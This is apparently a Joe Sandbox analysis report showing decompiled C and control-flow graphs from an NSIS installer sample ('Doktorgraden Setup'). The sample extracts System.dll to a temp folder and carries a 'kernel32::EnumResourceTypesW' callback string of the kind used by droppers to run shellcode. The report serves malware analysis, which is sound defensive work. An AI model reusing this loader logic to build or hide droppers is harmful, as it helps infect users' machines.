4060b1-4060ba call 405f9f 476->479 476->480 477->456 483 4060f3-4060f6 478->483 484 40610b-406121 SHGetSpecialFolderLocation 478->484 479->473 480->477 486 406151-406157 lstrcatA 480->486 483->484 487 4060f8-4060ff 483->487 488 406123-40613d SHGetPathFromIDListA CoTaskMemFree 484->488 489 40613f 484->489 486->477 491 406107-406109 487->491 488->473 488->489 489->474 491->473 491->484
                                                      C-Code - Quality: 72%
                                                      			E00405F9F(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				intOrPtr _t76;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x7a271c; // 0xaea04d
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_t76 =  *0x7a2f98; // 0xae8c88
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 + _t76;
				_t39 = 0x7a1ee0;
				_t90 = 0x7a1ee0;
				if(_a4 >= 0x7a1ee0 && _a4 - 0x7a1ee0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E00405F9F(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x7a1ee0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t97 << 0xa);
							E00405F7D(_t90, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t97 << 0xa));
						} else {
							E00405EDB(_t90,  *0x7a2f48);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004061E7(_t90);
						}
						goto L42;
					}
					_t52 =  *0x7a2f4c; // 0x4a62000a
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x7a2fe4;
						if( *0x7a2fe4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x7a2f44; // 0x706c1370
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x7a2f48,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x7a2f48,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405E64((_t80 & 0x0000003f) +  *0x7a2f98, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x7a2f98, _t90, _t80 & 0x00000040); // executed
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405F9F(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00405F7D(_a4, _t39);
			}




























                                                      0x00405f9f
                                                      0x00405f9f
                                                      0x00405f9f
                                                      0x00405fa5
                                                      0x00405faa
                                                      0x00405fac
                                                      0x00405fbb
                                                      0x00405fbb
                                                      0x00405fbd
                                                      0x00405fc3
                                                      0x00405fc4
                                                      0x00405fc5
                                                      0x00405fc6
                                                      0x00405fc9
                                                      0x00405fd1
                                                      0x00405fd3
                                                      0x00405fea
                                                      0x00405fed
                                                      0x00405fed
                                                      0x004061c4
                                                      0x004061c4
                                                      0x004061c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00405ffa
                                                      0x00406000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406006
                                                      0x00406007
                                                      0x0040600a
                                                      0x0040600d
                                                      0x004061b7
                                                      0x004061c1
                                                      0x004061c3
                                                      0x004061c3
                                                      0x004061b9
                                                      0x004061bb
                                                      0x004061bd
                                                      0x004061be
                                                      0x004061be
                                                      0x00000000
                                                      0x004061b7
                                                      0x00406013
                                                      0x00406017
                                                      0x00406027
                                                      0x0040602e
                                                      0x00406031
                                                      0x00406039
                                                      0x0040603c
                                                      0x00406043
                                                      0x00406044
                                                      0x00406047
                                                      0x00406164
                                                      0x00406167
                                                      0x00406197
                                                      0x0040619a
                                                      0x0040619f
                                                      0x004061a3
                                                      0x004061a3
                                                      0x004061a8
                                                      0x004061ae
                                                      0x004061b0
                                                      0x00000000
                                                      0x004061b0
                                                      0x00406169
                                                      0x0040616c
                                                      0x00406181
                                                      0x00406188
                                                      0x0040616e
                                                      0x00406175
                                                      0x00406175
                                                      0x00406190
                                                      0x00406193
                                                      0x0040615c
                                                      0x0040615d
                                                      0x0040615d
                                                      0x00000000
                                                      0x00406193
                                                      0x0040604d
                                                      0x00406054
                                                      0x00406056
                                                      0x00406057
                                                      0x00406071
                                                      0x00406071
                                                      0x00406078
                                                      0x00406078
                                                      0x0040607f
                                                      0x00406083
                                                      0x00406083
                                                      0x00406084
                                                      0x00406086
                                                      0x004060bf
                                                      0x004060c2
                                                      0x004060d2
                                                      0x004060d5
                                                      0x004060dd
                                                      0x004060e3
                                                      0x004060e3
                                                      0x00406142
                                                      0x00406142
                                                      0x00406144
                                                      0x00000000
                                                      0x00000000
                                                      0x004060e7
                                                      0x004060ee
                                                      0x004060ef
                                                      0x004060f1
                                                      0x0040610b
                                                      0x00406119
                                                      0x0040611f
                                                      0x00406121
                                                      0x0040613f
                                                      0x0040613f
                                                      0x0040613f
                                                      0x00000000
                                                      0x0040613f
                                                      0x00406127
                                                      0x00406130
                                                      0x00406133
                                                      0x00406139
                                                      0x0040613d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040613d
                                                      0x004060f3
                                                      0x004060f6
                                                      0x00000000
                                                      0x00000000
                                                      0x00406105
                                                      0x00406107
                                                      0x00406109
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406109
                                                      0x00000000
                                                      0x00406142
                                                      0x004060ca
                                                      0x00000000
                                                      0x00406088
                                                      0x004060a3
                                                      0x004060a8
                                                      0x004060ab
                                                      0x0040614b
                                                      0x0040614b
                                                      0x0040614f
                                                      0x00406157
                                                      0x00406157
                                                      0x00000000
                                                      0x0040614f
                                                      0x004060b5
                                                      0x00406146
                                                      0x00406146
                                                      0x00406149
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406149
                                                      0x00406086
                                                      0x00406059
                                                      0x0040605d
                                                      0x00000000
                                                      0x00000000
                                                      0x0040605f
                                                      0x00406063
                                                      0x00000000
                                                      0x00000000
                                                      0x00406065
                                                      0x00406069
                                                      0x00000000
                                                      0x0040606b
                                                      0x0040606b
                                                      0x00000000
                                                      0x0040606b
                                                      0x00406069
                                                      0x004061ce
                                                      0x004061d8
                                                      0x004061e4
                                                      0x004061e4
                                                      0x00000000

                                                      APIs
                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060CA
                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,004050DC,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000), ref: 004060DD
                                                      • SHGetSpecialFolderLocation.SHELL32(004050DC,75A623A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,004050DC,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000), ref: 00406119
                                                      • SHGetPathFromIDListA.SHELL32(75A623A0,Call), ref: 00406127
                                                      • CoTaskMemFree.OLE32(75A623A0), ref: 00406133
                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406157
                                                      • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,004050DC,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00000000,00790EF8,75A623A0), ref: 004061A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                      • API String ID: 717251189-1793055447
                                                      • Opcode ID: bb64b4f7ee53809b8b713d72881a51aa8b5a5b4d150e8921106cb3b28257d830
                                                      • Instruction ID: af1646b593eff3a51ac73f0ed8843f2caf1d37b4bb9fd39580f45c5e5a4eb59e
                                                      • Opcode Fuzzy Hash: bb64b4f7ee53809b8b713d72881a51aa8b5a5b4d150e8921106cb3b28257d830
                                                      • Instruction Fuzzy Hash: 8B61E471904205AEDF119F24CC84BBE7BB59B46314F16813FE903BA2D2D67D4992CB49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401759 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 774 401759-40177c call 402acb call 405982 779 401786-401798 call 405f7d call 405915 lstrcatA 774->779 780 40177e-401784 call 405f7d 774->780 785 40179d-4017a3 call 4061e7 779->785 780->785 790 4017a8-4017ac 785->790 791 4017ae-4017b8 call 406280 790->791 792 4017df-4017e2 790->792 800 4017ca-4017dc 791->800 801 4017ba-4017c8 CompareFileTime 791->801 793 4017e4-4017e5 call 405af1 792->793 794 4017ea-401806 call 405b16 792->794 793->794 802 401808-40180b 794->802 803 40187e-4018a7 call 4050a4 call 402f9c 794->803 800->792 801->800 804 401860-40186a call 4050a4 802->804 805 40180d-40184f call 405f7d * 2 call 405f9f call 405f7d call 405699 802->805 817 4018a9-4018ad 803->817 818 4018af-4018bb SetFileTime 803->818 815 401873-401879 804->815 805->790 837 401855-401856 805->837 820 402960 815->820 817->818 819 4018c1-4018cc CloseHandle 817->819 818->819 822 4018d2-4018d5 819->822 823 402957-40295a 819->823 825 402962-402966 820->825 826 4018d7-4018e8 call 405f9f lstrcatA 822->826 827 4018ea-4018ed call 405f9f 822->827 823->820 834 4018f2-4022e2 826->834 827->834 838 4022e7-4022ec 834->838 839 4022e2 call 405699 834->839 837->815 840 401858-401859 837->840 838->825 839->838 840->804
                                                      C-Code - Quality: 61%
                                                      			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402ACB(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405982(_t82);
				_push(_t82);
				_t83 = "Call";
				if(_t33 == 0) {
					lstrcatA(E00405915(E00405F7D(_t83, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize")), ??);
				} else {
					E00405F7D();
				}
				E004061E7(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00406280(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405AF1(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405B16(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E004050A4(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x7a2fe8;
						goto L32;
					} else {
						E00405F7D(0x40abe8, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)");
						E00405F7D("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", _t83);
						E00405F9F(_t75, 0x40abe8, _t83, "C:\Users\Arthur\AppData\Local\Temp\nse224D.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405F7D("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40abe8);
						_t62 = E00405699("C:\Users\Arthur\AppData\Local\Temp\nse224D.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a2fe8 =  &( *0x7a2fe8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E004050A4();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E004050A4(0xffffffea,  *(_t85 - 8));
				 *0x7a3014 =  *0x7a3014 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402F9C(); // executed
				 *0x7a3014 =  *0x7a3014 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405F9F(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E00405F9F(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405699();
					goto L29;
				}
				goto L33;
			}

















                                                      0x00401759
                                                      0x00401760
                                                      0x00401769
                                                      0x0040176c
                                                      0x0040176f
                                                      0x00401774
                                                      0x00401775
                                                      0x0040177c
                                                      0x00401798
                                                      0x0040177e
                                                      0x0040177f
                                                      0x0040177f
                                                      0x0040179e
                                                      0x004017a8
                                                      0x004017a8
                                                      0x004017ac
                                                      0x004017af
                                                      0x004017b4
                                                      0x004017b6
                                                      0x004017b8
                                                      0x004017bd
                                                      0x004017bd
                                                      0x004017c8
                                                      0x004017c8
                                                      0x004017d9
                                                      0x004017db
                                                      0x004017db
                                                      0x004017dc
                                                      0x004017dc
                                                      0x004017df
                                                      0x004017e2
                                                      0x004017e5
                                                      0x004017e5
                                                      0x004017ec
                                                      0x004017fb
                                                      0x00401800
                                                      0x00401803
                                                      0x00401806
                                                      0x00000000
                                                      0x00000000
                                                      0x00401808
                                                      0x0040180b
                                                      0x00401865
                                                      0x0040186a
                                                      0x004015b0
                                                      0x0040271c
                                                      0x0040271c
                                                      0x00402957
                                                      0x0040295a
                                                      0x0040295a
                                                      0x00000000
                                                      0x0040180d
                                                      0x00401813
                                                      0x0040181e
                                                      0x0040182b
                                                      0x00401836
                                                      0x0040184c
                                                      0x0040184c
                                                      0x0040184f
                                                      0x00000000
                                                      0x00401855
                                                      0x00401855
                                                      0x00401856
                                                      0x00401873
                                                      0x00402960
                                                      0x00402960
                                                      0x00402960
                                                      0x00401858
                                                      0x00401858
                                                      0x00401859
                                                      0x00401492
                                                      0x004022e7
                                                      0x004022e7
                                                      0x004022e7
                                                      0x00401856
                                                      0x0040184f
                                                      0x00402962
                                                      0x00402966
                                                      0x00402966
                                                      0x00401883
                                                      0x00401888
                                                      0x0040188e
                                                      0x0040188f
                                                      0x00401890
                                                      0x00401893
                                                      0x00401896
                                                      0x0040189b
                                                      0x004018a1
                                                      0x004018a5
                                                      0x004018a7
                                                      0x004018af
                                                      0x004018bb
                                                      0x004018a9
                                                      0x004018a9
                                                      0x004018ad
                                                      0x00000000
                                                      0x00000000
                                                      0x004018ad
                                                      0x004018c4
                                                      0x004018ca
                                                      0x004018cc
                                                      0x00000000
                                                      0x004018d2
                                                      0x004018d2
                                                      0x004018d5
                                                      0x004018ed
                                                      0x004018d7
                                                      0x004018da
                                                      0x004018e3
                                                      0x004018e3
                                                      0x004018f2
                                                      0x004018f7
                                                      0x004022e2
                                                      0x00000000
                                                      0x004022e2
                                                      0x00000000

                                                      APIs
                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize,00000000,00000000,00000031), ref: 00401798
                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize,00000000,00000000,00000031), ref: 004017C2
                                                        • Part of subcall function 00405F7D: lstrcpynA.KERNEL32(?,?,00000400,004032BB,Doktorgraden Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F8A
                                                        • Part of subcall function 004050A4: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000,?), ref: 004050DD
                                                        • Part of subcall function 004050A4: lstrlenA.KERNEL32(004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000), ref: 004050ED
                                                        • Part of subcall function 004050A4: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,004030D4,004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0), ref: 00405100
                                                        • Part of subcall function 004050A4: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll), ref: 00405112
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405138
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405152
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405160
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nse224D.tmp$C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                      • API String ID: 1941528284-3487299283
                                                      • Opcode ID: 67287745aee8bdf74e8a1c0408434e65486f79d0b620527e9253d6af820af06e
                                                      • Instruction ID: 3f5d23f0505a0c405a30723695d383d48bc8799a0a07943a114376d49cde1fe8
                                                      • Opcode Fuzzy Hash: 67287745aee8bdf74e8a1c0408434e65486f79d0b620527e9253d6af820af06e
                                                      • Instruction Fuzzy Hash: B841B471900519BACF10BBB5CC46DAF76B9DF41368B20823BF522F11E1D67C8A419A6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004050A4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 841 4050a4-4050b9 842 40516f-405173 841->842 843 4050bf-4050d1 841->843 844 4050d3-4050d7 call 405f9f 843->844 845 4050dc-4050e8 lstrlenA 843->845 844->845 847 405105-405109 845->847 848 4050ea-4050fa lstrlenA 845->848 850 405118-40511c 847->850 851 40510b-405112 SetWindowTextA 847->851 848->842 849 4050fc-405100 lstrcatA 848->849 849->847 852 405162-405164 850->852 853 40511e-405160 SendMessageA * 3 850->853 851->850 852->842 854 405166-405169 852->854 853->852 854->842
                                                      C-Code - Quality: 100%
                                                      			E004050A4(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a2724; // 0x1040e
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x7a3014;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405F9F(0, _t39, 0x79ed20, 0x79ed20, _a4);
					}
					_t26 = lstrlenA(0x79ed20);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x7a2708, 0x79ed20); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x79ed20;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79ed20)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79ed20, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                      0x004050aa
                                                      0x004050b6
                                                      0x004050b9
                                                      0x004050bf
                                                      0x004050cb
                                                      0x004050ce
                                                      0x004050d1
                                                      0x004050d7
                                                      0x004050d7
                                                      0x004050dd
                                                      0x004050e5
                                                      0x004050e8
                                                      0x00405105
                                                      0x00405109
                                                      0x00405112
                                                      0x00405112
                                                      0x0040511c
                                                      0x00405125
                                                      0x00405131
                                                      0x00405138
                                                      0x0040513c
                                                      0x0040513f
                                                      0x00405152
                                                      0x00405160
                                                      0x00405160
                                                      0x00405164
                                                      0x00405166
                                                      0x00405169
                                                      0x00000000
                                                      0x00405169
                                                      0x004050ea
                                                      0x004050f2
                                                      0x004050fa
                                                      0x00405100
                                                      0x00000000
                                                      0x00405100
                                                      0x004050fa
                                                      0x004050e8
                                                      0x00405173

                                                      APIs
                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000,?), ref: 004050DD
